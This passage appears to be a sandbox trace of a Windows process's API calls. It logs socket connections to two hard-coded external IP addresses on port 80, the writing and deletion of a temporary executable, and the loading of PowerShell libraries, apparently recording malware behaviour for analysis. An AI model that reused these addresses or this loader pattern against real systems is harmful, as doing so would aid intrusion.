returned -1 [0057.895] closesocket (s=0x368) returned 0 [0057.899] GetCurrentProcess () returned 0xffffffffffffffff [0057.899] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c4f8 | out: TokenHandle=0x1c68c4f8*=0x368) returned 1 [0057.904] GetCurrentProcess () returned 0xffffffffffffffff [0057.904] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c4f8 | out: TokenHandle=0x1c68c4f8*=0x36c) returned 1 [0057.914] GetCurrentProcessId () returned 0xa80 [0057.919] CoTaskMemAlloc (cb=0x204) returned 0x2dcbc0 [0057.919] GetComputerNameW (in: lpBuffer=0x2dcbc0, nSize=0x335b280 | out: lpBuffer="YKYD69Q", nSize=0x335b280) returned 1 [0057.919] CoTaskMemFree (pv=0x2dcbc0) [0057.919] RegQueryValueExW (in: hKey=0x370, lpValueName="Library", lpReserved=0x0, lpType=0x1c68c95c, lpData=0x0, lpcbData=0x1c68c958*=0x0 | out: lpType=0x1c68c95c*=0x1, lpData=0x0, lpcbData=0x1c68c958*=0x1c) returned 0x0 [0057.919] CoTaskMemAlloc (cb=0x20) returned 0x1b7bb7e0 [0057.920] RegQueryValueExW (in: hKey=0x370, lpValueName="Library", lpReserved=0x0, lpType=0x1c68c92c, lpData=0x1b7bb7e0, lpcbData=0x1c68c928*=0x1c | out: lpType=0x1c68c92c*=0x1, lpData="netfxperf.dll", lpcbData=0x1c68c928*=0x1c) returned 0x0 [0057.920] CoTaskMemFree (pv=0x1b7bb7e0) [0057.920] RegQueryValueExW (in: hKey=0x370, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c68c95c, lpData=0x0, lpcbData=0x1c68c958*=0x0 | out: lpType=0x1c68c95c*=0x4, lpData=0x0, lpcbData=0x1c68c958*=0x4) returned 0x0 [0057.920] RegQueryValueExW (in: hKey=0x370, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c68c960, lpData=0x1c68c95c, lpcbData=0x1c68c958*=0x4 | out: lpType=0x1c68c960*=0x4, lpData=0x1c68c95c*=0x1, lpcbData=0x1c68c958*=0x4) returned 0x0 [0057.920] RegQueryValueExW (in: hKey=0x370, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c68c95c, lpData=0x0, lpcbData=0x1c68c958*=0x0 | out: lpType=0x1c68c95c*=0x4, lpData=0x0, lpcbData=0x1c68c958*=0x4) returned 0x0 [0057.920] RegQueryValueExW (in: hKey=0x370, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c68c960, lpData=0x1c68c95c, lpcbData=0x1c68c958*=0x4 | out: lpType=0x1c68c960*=0x4, lpData=0x1c68c95c*=0x137a, lpcbData=0x1c68c958*=0x4) returned 0x0 [0057.920] RegCloseKey (hKey=0x370) returned 0x0 [0057.921] RegQueryValueExW (in: hKey=0x370, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c68c91c, lpData=0x0, lpcbData=0x1c68c918*=0x0 | out: lpType=0x1c68c91c*=0x4, lpData=0x0, lpcbData=0x1c68c918*=0x4) returned 0x0 [0057.921] RegQueryValueExW (in: hKey=0x370, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c68c920, lpData=0x1c68c91c, lpcbData=0x1c68c918*=0x4 | out: lpType=0x1c68c920*=0x4, lpData=0x1c68c91c*=0x3, lpcbData=0x1c68c918*=0x4) returned 0x0 [0057.921] RegQueryValueExW (in: hKey=0x370, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c68c91c, lpData=0x0, lpcbData=0x1c68c918*=0x0 | out: lpType=0x1c68c91c*=0x4, lpData=0x0, lpcbData=0x1c68c918*=0x4) returned 0x0 [0057.922] RegQueryValueExW (in: hKey=0x370, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c68c920, lpData=0x1c68c91c, lpcbData=0x1c68c918*=0x4 | out: lpType=0x1c68c920*=0x4, lpData=0x1c68c91c*=0x20000, lpcbData=0x1c68c918*=0x4) returned 0x0 [0057.922] RegQueryValueExW (in: hKey=0x370, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c68c91c, lpData=0x0, lpcbData=0x1c68c918*=0x0 | out: lpType=0x1c68c91c*=0x3, lpData=0x0, lpcbData=0x1c68c918*=0xaa) returned 0x0 [0057.922] RegQueryValueExW (in: hKey=0x370, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c68c91c, lpData=0x335e548, lpcbData=0x1c68c918*=0xaa | out: lpType=0x1c68c91c*=0x3, lpData=0x335e548*, lpcbData=0x1c68c918*=0xaa) returned 0x0 [0057.924] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0057.926] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c68c8d0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x354 [0057.928] MapViewOfFile (hFileMappingObject=0x354, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1b3f0000 [0057.928] VirtualQuery (in: lpAddress=0x1b3f0000, lpBuffer=0x1c68c8c8, dwLength=0x30 | out: lpBuffer=0x1c68c8c8*(BaseAddress=0x1b3f0000, AllocationBase=0x1b3f0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0057.929] LocalFree (hMem=0x1b7bd230) returned 0x0 [0057.929] RegCloseKey (hKey=0x370) returned 0x0 [0057.931] GetVersionExW (in: lpVersionInformation=0x1c68b8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c68b8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.932] GetVersionExW (in: lpVersionInformation=0x1c68b870*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c68b870*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.933] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x335f1f8, cbSid=0x1c68c8b0 | out: pSid=0x335f1f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8b0) returned 1 [0057.945] CreateMutexW (lpMutexAttributes=0x335f400, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x370 [0057.947] WaitForSingleObject (hHandle=0x370, dwMilliseconds=0x1f4) returned 0x0 [0057.947] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x335f718, cbSid=0x1c68c810 | out: pSid=0x335f718*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c810) returned 1 [0057.948] CreateMutexW (lpMutexAttributes=0x335f8d0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0 [0057.948] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x378 [0057.949] WaitForSingleObject (hHandle=0x378, dwMilliseconds=0x1f4) returned 0x0 [0057.950] ReleaseMutex (hMutex=0x378) returned 1 [0057.950] CloseHandle (hObject=0x378) returned 1 [0057.950] GetCurrentProcessId () returned 0xa80 [0057.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa80) returned 0x378 [0057.952] GetProcessTimes (in: hProcess=0x378, lpCreationTime=0x1c68c820, lpExitTime=0x1c68c818, lpKernelTime=0x1c68c810, lpUserTime=0x1c68c808 | out: lpCreationTime=0x1c68c820, lpExitTime=0x1c68c818, lpKernelTime=0x1c68c810, lpUserTime=0x1c68c808) returned 1 [0057.952] CloseHandle (hObject=0x378) returned 1 [0057.952] ReleaseMutex (hMutex=0x370) returned 1 [0057.952] CloseHandle (hObject=0x370) returned 1 [0057.953] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3360718, cbSid=0x1c68c8b0 | out: pSid=0x3360718*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8b0) returned 1 [0057.953] CreateMutexW (lpMutexAttributes=0x33608d0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x370 [0057.953] WaitForSingleObject (hHandle=0x370, dwMilliseconds=0x1f4) returned 0x0 [0057.954] ReleaseMutex (hMutex=0x370) returned 1 [0057.954] CloseHandle (hObject=0x370) returned 1 [0057.954] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3361538, cbSid=0x1c68c8b0 | out: pSid=0x3361538*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8b0) returned 1 [0057.954] CreateMutexW (lpMutexAttributes=0x33616f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x370 [0057.954] WaitForSingleObject (hHandle=0x370, dwMilliseconds=0x1f4) returned 0x0 [0057.955] ReleaseMutex (hMutex=0x370) returned 1 [0057.955] CloseHandle (hObject=0x370) returned 1 [0057.955] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3362350, cbSid=0x1c68c8b0 | out: pSid=0x3362350*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8b0) returned 1 [0057.955] CreateMutexW (lpMutexAttributes=0x3362508, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x370 [0057.955] WaitForSingleObject (hHandle=0x370, dwMilliseconds=0x1f4) returned 0x0 [0057.956] ReleaseMutex (hMutex=0x370) returned 1 [0057.956] CloseHandle (hObject=0x370) returned 1 [0057.956] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3363160, cbSid=0x1c68c8b0 | out: pSid=0x3363160*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c8b0) returned 1 [0057.956] CreateMutexW (lpMutexAttributes=0x3363318, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x370 [0057.956] WaitForSingleObject (hHandle=0x370, dwMilliseconds=0x1f4) returned 0x0 [0057.957] ReleaseMutex (hMutex=0x370) returned 1 [0057.957] CloseHandle (hObject=0x370) returned 1 [0057.958] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3363f70, cbSid=0x1c68c860 | out: pSid=0x3363f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c860) returned 1 [0057.958] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3364d98, cbSid=0x1c68c860 | out: pSid=0x3364d98*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c860) returned 1 [0057.958] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3365b90, cbSid=0x1c68c860 | out: pSid=0x3365b90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c860) returned 1 [0057.958] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3366998, cbSid=0x1c68c860 | out: pSid=0x3366998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c860) returned 1 [0057.959] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x3367798, cbSid=0x1c68c860 | out: pSid=0x3367798*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c68c860) returned 1 [0057.960] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x378 [0057.961] ioctlsocket (in: s=0x370, cmd=-2147195266, argp=0x1c68ce98 | out: argp=0x1c68ce98) returned 0 [0057.961] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x37c [0057.961] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x380 [0057.961] ioctlsocket (in: s=0x37c, cmd=-2147195266, argp=0x1c68ce98 | out: argp=0x1c68ce98) returned 0 [0057.962] WSAIoctl (in: s=0x370, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c68ce10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c68ce10, lpOverlapped=0x0) returned -1 [0057.963] CoTaskMemAlloc (cb=0x204) returned 0x2dc9b0 [0057.963] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2dc9b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0057.964] CoTaskMemFree (pv=0x2dc9b0) [0057.965] WSAEventSelect (s=0x370, hEventObject=0x378, lNetworkEvents=512) returned 0 [0057.965] WSAIoctl (in: s=0x37c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c68ce10, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c68ce10, lpOverlapped=0x0) returned -1 [0057.965] CoTaskMemAlloc (cb=0x204) returned 0x2dc9b0 [0057.965] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2dc9b0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0057.965] CoTaskMemFree (pv=0x2dc9b0) [0057.965] WSAEventSelect (s=0x37c, hEventObject=0x380, lNetworkEvents=512) returned 0 [0057.965] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x384 [0057.966] RasConnectionNotificationW (param_1=0xffffffffffffffff, param_2=0x384, param_3=0x3) returned 0x0 [0057.970] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x1c68cf50 | out: phkResult=0x1c68cf50*=0x394) returned 0x0 [0057.972] RegOpenKeyExW (in: hKey=0x394, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c68ce38 | out: phkResult=0x1c68ce38*=0x424) returned 0x0 [0057.972] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x428 [0057.973] RegNotifyChangeKeyValue (hKey=0x424, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x428, fAsynchronous=1) returned 0x0 [0057.973] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c68ce60 | out: phkResult=0x1c68ce60*=0x42c) returned 0x0 [0057.973] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x430 [0057.973] RegNotifyChangeKeyValue (hKey=0x42c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x430, fAsynchronous=1) returned 0x0 [0057.974] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c68ce60 | out: phkResult=0x1c68ce60*=0x434) returned 0x0 [0057.974] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x438 [0057.974] RegNotifyChangeKeyValue (hKey=0x434, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x438, fAsynchronous=1) returned 0x0 [0057.974] GetCurrentProcess () returned 0xffffffffffffffff [0057.974] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cdc8 | out: TokenHandle=0x1c68cdc8*=0x43c) returned 1 [0057.981] GetCurrentProcess () returned 0xffffffffffffffff [0057.981] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c598 | out: TokenHandle=0x1c68c598*=0x450) returned 1 [0057.985] GetCurrentProcess () returned 0xffffffffffffffff [0057.986] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c598 | out: TokenHandle=0x1c68c598*=0x454) returned 1 [0057.999] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c68ce98 | out: pProxyConfig=0x1c68ce98) returned 1 [0058.045] SetEvent (hEvent=0x398) returned 1 [0058.062] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x1, ppwstrAutoConfigUrl=0x1c68cd70 | out: ppwstrAutoConfigUrl=0x1c68cd70*=0x0) returned 0 [0073.866] WinHttpDetectAutoProxyConfigUrl (in: dwAutoDetectFlags=0x2, ppwstrAutoConfigUrl=0x1c68cd70 | out: ppwstrAutoConfigUrl=0x1c68cd70*=0x0) returned 0 [0080.184] GetCurrentProcess () returned 0xffffffffffffffff [0080.185] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c608 | out: TokenHandle=0x1c68c608*=0x4b8) returned 1 [0080.201] GetCurrentProcess () returned 0xffffffffffffffff [0080.201] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68c608 | out: TokenHandle=0x1c68c608*=0x4b0) returned 1 [0080.506] SetEvent (hEvent=0x398) returned 1 [0080.640] CoTaskMemAlloc (cb=0x10) returned 0x1b7ee2f0 [0080.640] inet_addr (cp="193.187.172.11") returned 0xbacbbc1 [0080.640] CoTaskMemFree (pv=0x1b7ee2f0) [0080.642] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4bc [0080.644] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c0 [0080.644] ioctlsocket (in: s=0x4bc, cmd=-2147195266, argp=0x1c68ce38 | out: argp=0x1c68ce38) returned 0 [0080.644] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c4 [0080.645] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c8 [0080.645] ioctlsocket (in: s=0x4c4, cmd=-2147195266, argp=0x1c68ce38 | out: argp=0x1c68ce38) returned 0 [0080.645] WSAIoctl (in: s=0x4bc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c68cdb0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c68cdb0, lpOverlapped=0x0) returned -1 [0080.645] CoTaskMemAlloc (cb=0x204) returned 0x2dcfe0 [0080.646] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2dcfe0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0080.646] CoTaskMemFree (pv=0x2dcfe0) [0080.646] WSAEventSelect (s=0x4bc, hEventObject=0x4c0, lNetworkEvents=512) returned 0 [0080.646] WSAIoctl (in: s=0x4c4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c68cdb0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c68cdb0, lpOverlapped=0x0) returned -1 [0080.647] CoTaskMemAlloc (cb=0x204) returned 0x2dcfe0 [0080.647] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x2dcfe0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0080.647] CoTaskMemFree (pv=0x2dcfe0) [0080.647] WSAEventSelect (s=0x4c4, hEventObject=0x4c8, lNetworkEvents=512) returned 0 [0080.677] GetAdaptersAddresses () returned 0x6f [0080.684] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b7f1440 [0080.684] GetAdaptersAddresses () returned 0x0 [0080.715] LocalFree (hMem=0x1b7f1440) returned 0x0 [0080.742] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc [0080.745] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4d0 [0080.750] WSAConnect (in: s=0x4cc, name=0x3372f88*(sa_family=2, sin_port=0x50, sin_addr="193.187.172.11"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned -1 [0101.801] CoTaskMemAlloc (cb=0x204) returned 0x2dcfe0 [0101.801] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x274c, dwLanguageId=0x0, lpBuffer=0x2dcfe0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.\r\n") returned 0xb9 [0101.801] CoTaskMemFree (pv=0x2dcfe0) [0102.143] CloseHandle (hObject=0x308) returned 1 [0102.148] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", nBufferLength=0x105, lpBuffer=0x1c687600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", lpFilePart=0x0) returned 0x30 [0102.151] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe")) returned 1 [0102.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c688350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6882a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6882a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c6882a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0102.319] CoTaskMemAlloc (cb=0x104) returned 0x32bd20 [0102.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x32bd20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.319] CoTaskMemFree (pv=0x32bd20) [0102.686] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", nBufferLength=0x105, lpBuffer=0x1c68cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe", lpFilePart=0x0) returned 0x30 [0102.686] SetErrorMode (uMode=0x1) returned 0x1 [0102.686] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\tmp6149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\tmp6149.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1cc [0102.687] GetFileType (hFile=0x1cc) returned 0x1 [0102.687] SetErrorMode (uMode=0x1) returned 0x1 [0102.687] GetFileType (hFile=0x1cc) returned 0x1 [0102.687] SetEvent (hEvent=0x398) returned 1 [0102.689] GetCurrentProcess () returned 0xffffffffffffffff [0102.689] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cdf8 | out: TokenHandle=0x1c68cdf8*=0x4d4) returned 1 [0102.730] RegNotifyChangeKeyValue (hKey=0x424, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x428, fAsynchronous=1) returned 0x0 [0102.730] GetCurrentProcess () returned 0xffffffffffffffff [0102.730] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c68cd88 | out: TokenHandle=0x1c68cd88*=0x4d8) returned 1 [0102.734] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c68ce38 | out: pProxyConfig=0x1c68ce38) returned 1 [0102.755] SetEvent (hEvent=0x398) returned 1 [0102.755] CoTaskMemAlloc (cb=0x10) returned 0x1b7ee5d0 [0102.756] inet_addr (cp="46.173.218.240") returned 0xf0daad2e [0102.756] CoTaskMemFree (pv=0x1b7ee5d0) [0102.756] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e0 [0102.756] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc [0102.757] CoTaskMemAlloc (cb=0x10) returned 0x1b7ee5d0 [0102.757] inet_addr (cp="46.173.218.240") returned 0xf0daad2e [0102.757] CoTaskMemFree (pv=0x1b7ee5d0) [0102.757] WSAConnect (in: s=0x4e0, name=0x33d7c80*(sa_family=2, sin_port=0x50, sin_addr="46.173.218.240"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0102.811] closesocket (s=0x4dc) returned 0 [0102.832] send (in: s=0x4e0, buf=0x33db6f8*, len=77, flags=0 | out: buf=0x33db6f8*) returned 77 [0102.842] setsockopt (s=0x4e0, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0102.843] recv (in: s=0x4e0, buf=0x33d65c0, len=4096, flags=0 | out: buf=0x33d65c0*) returned 284 [0102.904] select (in: nfds=0, readfds=0x33dd660, writefds=0x0, exceptfds=0x0, timeout=0x1c68d080 | out: readfds=0x33dd660, writefds=0x0, exceptfds=0x0) returned 0 [0102.906] send (in: s=0x4e0, buf=0x33dd828*, len=48, flags=0 | out: buf=0x33dd828*) 